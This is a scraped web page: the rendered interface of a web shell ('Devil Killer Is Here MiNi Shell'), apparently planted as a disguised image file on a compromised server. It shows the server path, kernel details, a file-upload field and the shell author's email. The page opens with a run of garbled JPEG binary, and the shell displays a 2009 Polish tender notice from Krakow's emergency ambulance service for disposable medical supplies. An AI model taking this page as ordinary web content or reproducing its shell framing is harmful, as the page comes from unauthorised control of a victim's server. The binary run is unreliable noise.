JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090504/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090504/132130-N-2009.html

<p class="kh_header"><b>Kraków: dostawa sprzętu medycznego jednorazowego użytku  do Apteki Zakładowej</b><br>
<b>Numer ogłoszenia: 132130 - 2009; data zamieszczenia: 04.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krakowskie Pogotowie Ratunkowe , ul. Łazarza 14, 31-530 Kraków, woj. małopolskie, tel. 012 4244200, faks 012 4244300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpr.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa sprzętu medycznego jednorazowego użytku  do Apteki Zakładowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa : Dostawa sprzętu medycznego jednorazowego użytku do Apteki Zakładowej zgodnie 
z wykazem asortymentowym i ilościowym określonym w załączniku nr 4 do niniejszej SIWZ (dla każdej części zamówienia oddzielnie). 
CPV 33100000
1.	Zamówienie podzielone jest na 5 części :
1)	materiały jednorazowego użytku 	- CPV 33141000-0
2)	rękawiczki ochronne		- CPV  33141420-0 , 18424300-0
3)	rurki krtaniowe			- CPV  33157800-3
4)	filtry do ssaków			- CPV  33141000-0
5)	igły doszpikowe			- CPV  33141320-9
2.	Zamawiający przewiduje możliwość stosowania zamówień uzupełniających, o których mowa 
w art. 67 ust.1 pkt. 7.
3.	Zamawiający dopuszcza możliwość składania ofert częściowych na dowolną ilość części.
4.	Oferty nie zawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone.
5.	Nie dopuszcza się składania ofert wariantowych.
6.	Zamawiający nie przewiduje prowadzenia aukcji elektronicznej.
7.	Zamawiający nie przewiduje prowadzenia dynamicznego systemu zakupów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.14.20-0, 33.15.78.00-3, 33.14.10.00-0, 33.14.13.20-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Oferta winna być zabezpieczona wadium odpowiednio w  wysokości : 
1)	Część I zamówienia  2 300,00 PLN 
2)	Część II zamówienia    800,00 PLN
3)	Część III zamówienia	200,00 PLN
4)	Część IV zamówienia	130,00 PLN
5)	Część V zamówienia	200,00 PLN
2.	Przy wnoszeniu wadium Wykonawca winien podać  numer i nazwę postępowania oraz której(ch) części zamówienia dotyczy(ą).
3.	Termin wnoszenia wadium upływa wraz z upływem terminu składania ofert tj. dnia 12.05.2008 r. do godz. 12,30 - (decyduje termin uznania rachunku bankowego Zamawiającego).
4.	Wadium może być wnoszone :
a)	w pieniądzu, przelewem na konto Krakowskiego Pogotowia Ratunkowego:
PKO Bank Polski Regionalny Oddział w Krakowie
Nr 92 1020 2892 0000 5902 0185 8430
b)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych, 
d)	w gwarancjach ubezpieczeniowych,
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zmianami).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą brać udział wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy 
i nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy.
Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana 
w oparciu o dokumenty, o których mowa w pkt VI.2. 1) do 4)  SIWZ zgodnie z formułą spełnia , nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> w celu potwierdzenia, że posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy:
1)	oświadczenie Wykonawcy - wypełnione i podpisane odpowiednio przez osoby upoważnione do reprezentowania Wykonawcy albo pełnomocnika reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia (według wzoru stanowiącego załącznik nr 1 do SIWZ);
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat, względnie zaświadczenie, że oferent uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, względnie zaświadczenie, że oferent uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kpr.med.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Krakowskie Pogotowie Ratunkowe, ul. Łazarza 14 , 31-530 Kraków.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2009 godzina 12:30, miejsce: Krakowskie Pogotowie Ratunkowe, ul. Łazarza 14 , 31-530 Kraków, pok. 218 Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1 zamówienia : materiały jednorazowego użytku 	
	
Lp.	Asortyment
1	2
1.	Igła j.u. 0,5x25 x 100 szt.
2.	Igła j.u. 0,6x25 x 100 szt.
3.	Igła j.u. 0,7x30 x 100 szt.
4.	Igła j.u. 0,8x40 x 100 szt.
5.	Igła j.u. 0,9x40 x 100 szt.
6.	Igła j.u. 1,2x40 x 100 szt.
7.	Strzykawka j.u. 2ml x 100 szt. czytelna skala rozszerzona do 3 ml, kolorystycznie zabarwiony tłok
8.	Strzykawka j.u. 5ml x 100 szt. czytelna skala rozszerzona do 6 ml, kolorystycznie zabarwiony tłok
9.	Strzykawka j.u. 10ml x 100 szt. czytelna skala rozszerzona do 12 ml, kolorystycznie zabarwiony tłok
10.	Strzykawka j.u. 20ml x 100 szt. czytelna skala rozszerzona do 24 ml, kolorystycznie zabarwiony tłok
11.	Strzykawka j.u.do pompy infuz. do leków światłoczułych ( bursztynowa ) 50,60 ml, 
12.	Strzykawka j.u.do pompy infuzyjnej 50,60 ml, 
13.	Kaniula wykonana z  poliuretanu z czterema  paskami kontrastującymi w RTG, wyposażona w samodomykający się zawór portu bocznego,  elastyczne skrzydełka mocujace o skośnej płaczyźnie, zatyczkę z filtrem hydrofobowym i koreczek luer lock.  Rozmiary: 22G - 14G ( średnica 0,9-2,2 i długość 25 - 50 mm)
14.	Neoflon 0.6 - lub równoważy - kaniula dla noworodków 0,6x 19 mm - 13 ml na min z korkiem
15.	Cewnik do odsys. górnych dróg oddechowych nr 6
16.	Cewnik do odsys. górnych dróg oddechowych nr 8
17.	Cewnik do odsys. górnych dróg oddechowych nr 10
18.	Cewnik do odsys. górnych dróg oddechowych nr 12
19.	Cewnik do odsys. górnych dróg oddechowych nr 14
20.	Cewnik do odsys. górnych dróg oddechowych nr 16
21.	Cewnik do odsys. górnych dróg oddechowych nr 18
22.	Cewnik do odsys. górnych dróg oddechowych nr 20
23.	Cewnik do odsys. górnych dróg oddechowych nr 22
24.	Cewnik do podawania tlenu przez nos (wąsy) długość powyżej 150 cm
25.	Cewnik Foley nr 10
26.	Cewnik Foley nr 12
27.	Cewnik Foley nr 14
28.	Cewnik Foley nr 16
29.	Cewnik Foley nr 18
30.	Cewnik Foley nr 20
31.	Cewnik Foley nr 22
32.	Elektroda do EKG ( uniwersalna ) dla dorosłych
33.	Elektroda do EKG dla dzieci
34.	Elektroda do EKG dla noworodków, baza flizelinowa, pakowane po 3 szt
35.	Filtr pbakt, pwirusowy dziecięcy (mini) 
36.	Filtr pbakt, pwirusowy elektrostatyczny, z nawilżaczem i wymiennikiem ciepła i wilgoci dla dzieci o wadze do 3.5 kg
37.	Filtr pbakt. pwirusowy uniwersalny z większą skutecznością  filtrowania
38.	Kranik trójdrożny
39.	Maska tlenowa dla dorosłych z drenem, połączenie niestałe
40.	Maska tlenowa dla dzieci z drenem, połączenie niestałe
41.	Maska tlenowa dla dzieci do wysokich stężeń tlenu
42.	Maska tlenowa dla dorosłych do wysokich stężeń tlenu
43.	Maska krtaniowa j. u. rozm. 1 -5kg
44.	Maska krtaniowa j. u. rozm. 2 10-20kg
45.	Maska krtaniowa j.u. rozm. 3 30-50kg
46.	Maska krtaniowa j. u. rozm. 4 50-70kg
47.	Maska krtaniowa j. u. rozm. 5 70-100kg
48.	Pinceta jraz.użytku 
49.	Przedłużacz do pomp infuz.
50.	Przedłużacz do pomp infuz. do leków  światłoczułych
51.	Dren do tlenu , długość min. 2,1 m 
52.	Przyrząd do przetaczania płynów infuzyjnych
53.	Przyrząd do szybkiego  przetaczania 
54.	Strzykawka j.u.cewnikowa JANET, typu luer, 100ml
55.	Rurka Guedel 1
56.	Rurka Guedel 2
57.	Rurka Guedel 3
58.	Rurka Guedel o rozmiarach : 0, 00, 000 - 
59.	Rurka intubacyjna nr 2 bez mankietu
60.	Rurka intubacyjna nr 2,5 bez mankietu
61.	Rurka intubacyjna nr 3 bez mankietu
62.	Rurka intubacyjna nr 3,5 bez mankietu
63.	Rurka intubacyjna nr 4 bez mankietu
64.	Rurka intubacyjna nr 4,5 bez mankietu
65.	Rurka intubacyjna nr 5 z mankietem
66.	Rurka intubacyjna nr 5,5 z mankietem
67.	Rurka intubacyjna nr 6 z mankietem
68.	Rurka intubacyjna nr 6,5 z mankietem
69.	Rurka intubacyjna nr 7 z mankietem
70.	Rurka intubacyjna nr 7,5 z mankietem
71.	Rurka intubacyjna nr 8 z mankietem
72.	Rurka intubacyjna nr 8,5 z mankietem
73.	Rurka intubacyjna nr 9 z mankietem
74.	Rurka intubacyjna nr 9,5 z mankietem
75.	Rurka intubacyjna nr 10 z mankietem
76.	Zaciskacz do pępowiny
77.	Żel do ekg 250g
78.	Żel do usg 500g
79.	Zgłębnik żołądkowy nr 16, 18, 20
80.	Plaster do kaniul
81.	Ostrza wymienne do skalpela, wykonane ze stali węglowej, nr. 23, pakowane po 100 szt
82.	Golarka jednorazowa
83.	Sterylne paski do zamykania ran - Steri Strip lub równoważne,  rozm. 6 x 75 mm
84.	Maski z nebulizatorem dla dorosłych
85.	Maski z nebulizatorem dla dzieci
86.	Okulary tlenowe dla noworodków
87.	Łączniki do tlenu - obrotowe, kątowe (układ T)
88.	Łącznik schodkowy do ssaka
89.	Zestaw do konikotomii
90.	Zestaw do drenażu opłucnej zawierający kaniulę punkcyjną, cewnik, zbiornik o poj. Ok. 2L, łącznik z zastawką antyzwrotną, kranik trójdrożny, strzykawkę poj. Ok. 60ml.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa rękawiczek ochronnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	2
1.	Rękawice lateksowe chirurgiczne,pudrowane, sterylne,  poziom AQL 1,0 - pakowane po 1 parze                                 
a)	                                                                   nr 6,5
b)	                                                                   nr 7
c)	                                                                   nr 8
2.	Rękawice lateksowe, niejałowe bezpudrowe, zgodne         z normą EN 455,  poziom AQL 1,5 - oznaczony na opakowaniu, pakowane po 100 szt.
	
a)	Małe (S) 
b)	Średnie (M) 
c)	Duże (L)
3.	Rękawice winylowe, niejałowe, bezpudrowe, długość 245 mm zgodne z normą EN 455 pakowane po 100 szt.
a)	Średnie (M)
b)	Duże (L)
4.	Rękawiczki chirurgiczne Nuzonex lub równoważne            o takich samych parametrach tzn. neopreonowe, bezpudrowe, polimeryzowane, teksturowane, bezproteinowe, poziom AQL 1,0 pakowane po 25 par, rozm nr. 8.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa rurek krtaniowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	rurka krtaniowa j. u. rozm 3	60
2.	rurka krtaniowa j.u.  rozm 4	60
3.	rurka krtaniowa j.u.  rozm 5	60.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.78.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa filtró do ssaków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filtry bakteryjno-wirusowe do ssaków kompatybilne ze ssakiem Laerdal
2.	Filtry bakteryjno-wirusowe do ssaków kompatybilne ze ssakiem Boscarol.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa igieł doszpikowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	igła doszpikowa - jednorazowa igła do infuzji śródkostnej umożliwiająca bezpieczny i prosty dostęp żylny w celu podania płynów lub medykamentów oznaczona kolorem umożliwiającym rozpoznanie wielkości i przeznaczenia dla dorosłych
2.	igła doszpikowa - jednorazowa igła do infuzji śródkostnej umożliwiająca bezpieczny i prosty dostęp żylny w celu podania płynów lub medykamentów oznaczona kolorem umożliwiającym rozpoznanie wielkości i przeznaczenia dla dzieci.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com